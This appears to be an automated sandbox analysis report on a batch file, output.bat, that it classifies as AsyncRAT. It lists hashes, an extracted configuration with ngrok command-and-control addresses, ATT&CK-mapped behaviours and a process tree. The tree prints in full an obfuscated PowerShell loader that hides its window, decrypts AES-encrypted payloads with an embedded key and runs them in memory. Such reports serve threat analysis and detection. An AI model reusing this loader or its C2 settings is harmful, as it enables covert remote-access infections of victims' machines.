Analysis
-
max time kernel
72s -
max time network
73s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2024 23:08
Static task
static1
Behavioral task
behavioral1
Sample
output.bat
Resource
win7-20240903-en
General
-
Target
output.bat
-
Size
46KB
-
MD5
8962ec15efd02a1a96c54aac7878a620
-
SHA1
1c587e367111cf850bdda811e55c97076264c6a1
-
SHA256
dfc981ff489e6ba91c43acceb32b3f5e518b001ac611742e32c828e09202e66b
-
SHA512
5ab987b13a0b9ffc02020c9177e32e46350cd3ab6650954ba49a9de68fc56c353bee6a6cec1f1dc53f04123ea914c64cb5752ebd33c468cc9709bff31a3bee4b
-
SSDEEP
768:Mfh+sVMVei1JzM6VZS5mEF7Zn4sLzrZsuL6QZVt6DAmVeT3HaaXhk34Kra2:y1iLzMW4rFV4s9suLjZVg8qeTXacxKr3
Malware Config
Extracted
asyncrat
0.5.8
Default
6.tcp.eu.ngrok.io:19580
6.tcp.eu.ngrok.io:2024
6.tcp.eu.ngrok.io:15251
UkUiX8RLZesC
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4080-40-0x00000000075E0000-0x00000000075F2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid Process 14 4080 powershell.exe 38 4080 powershell.exe 40 4080 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid Process 4080 powershell.exe 4080 powershell.exe 4440 powershell.exe 4440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid Process procid_target PID 5060 wrote to memory of 3976 5060 cmd.exe 83 PID 5060 wrote to memory of 3976 5060 cmd.exe 83 PID 3976 wrote to memory of 4068 3976 cmd.exe 85 PID 3976 wrote to memory of 4068 3976 cmd.exe 85 PID 3976 wrote to memory of 4080 3976 cmd.exe 86 PID 3976 wrote to memory of 4080 3976 cmd.exe 86 PID 3976 wrote to memory of 4080 3976 cmd.exe 86 PID 4080 wrote to memory of 4440 4080 powershell.exe 87 PID 4080 wrote to memory of 4440 4080 powershell.exe 87 PID 4080 wrote to memory of 4440 4080 powershell.exe 87
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\output.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\output.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\output.bat';$NTFv='FrPqzeoPqzemBPqzeasPqzee6Pqze4SPqzetPqzeriPqzenPqzegPqze'.Replace('Pqze', ''),'EnBZWdtryBZWdPBZWdoinBZWdtBZWd'.Replace('BZWd', ''),'ROgtJeOgtJaOgtJdLOgtJiOgtJnOgtJeOgtJsOgtJ'.Replace('OgtJ', ''),'SJnWNplJnWNitJnWN'.Replace('JnWN', ''),'CouvlKpuvlKyuvlKTouvlK'.Replace('uvlK', ''),'LoJyLBaJyLBdJyLB'.Replace('JyLB', ''),'CrehuAKathuAKeDhuAKechuAKrhuAKypthuAKorhuAK'.Replace('huAK', ''),'MGcPeaGcPeinMGcPeodGcPeuGcPelGcPeeGcPe'.Replace('GcPe', ''),'ElkAHpekAHpmenkAHptAtkAHp'.Replace('kAHp', ''),'TraxAtMnsxAtMfxAtMoxAtMrmFxAtMixAtMnalxAtMBlxAtMoxAtMckxAtM'.Replace('xAtM', ''),'GexJcAtCxJcAurxJcArenxJcAtxJcAPrxJcAoxJcAcxJcAexJcAsxJcAsxJcA'.Replace('xJcA', ''),'InvsZZKosZZKkesZZK'.Replace('sZZK', ''),'DewnSWcownSWmpwnSWrwnSWeswnSWswnSW'.Replace('wnSW', ''),'CYAMzhYAMzangYAMzeYAMzExYAMztenYAMzsioYAMznYAMz'.Replace('YAMz', '');powershell -w hidden;function TUBbt($MBmkf){$MZmxd=[System.Security.Cryptography.Aes]::Create();$MZmxd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MZmxd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MZmxd.Key=[System.Convert]::($NTFv[0])('5ZE3qI9dMGt62SkKchIEdZFjOehLiufxwxgbD+17Q1k=');$MZmxd.IV=[System.Convert]::($NTFv[0])('NkxYly32CEIorbL5iaQQ4A==');$wvMTZ=$MZmxd.($NTFv[6])();$QtJva=$wvMTZ.($NTFv[9])($MBmkf,0,$MBmkf.Length);$wvMTZ.Dispose();$MZmxd.Dispose();$QtJva;}function ikosY($MBmkf){$kwoJC=New-Object System.IO.MemoryStream(,$MBmkf);$OASso=New-Object System.IO.MemoryStream;$ysOOg=New-Object System.IO.Compression.GZipStream($kwoJC,[IO.Compression.CompressionMode]::($NTFv[12]));$ysOOg.($NTFv[4])($OASso);$ysOOg.Dispose();$kwoJC.Dispose();$OASso.Dispose();$OASso.ToArray();}$JuvsJ=[System.IO.File]::($NTFv[2])([Console]::Title);$zwzsq=ikosY (TUBbt ([Convert]::($NTFv[0])([System.Linq.Enumerable]::($NTFv[8])($JuvsJ, 5).Substring(2))));$JbTah=ikosY (TUBbt ([Convert]::($NTFv[0])([System.Linq.Enumerable]::($NTFv[8])($JuvsJ, 6).Substring(2))));[System.Reflection.Assembly]::($NTFv[5])([byte[]]$JbTah).($NTFv[1]).($NTFv[11])($null,$null);[System.Reflection.Assembly]::($NTFv[5])([byte[]]$zwzsq).($NTFv[1]).($NTFv[11])($null,$null); "3⤵PID:4068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82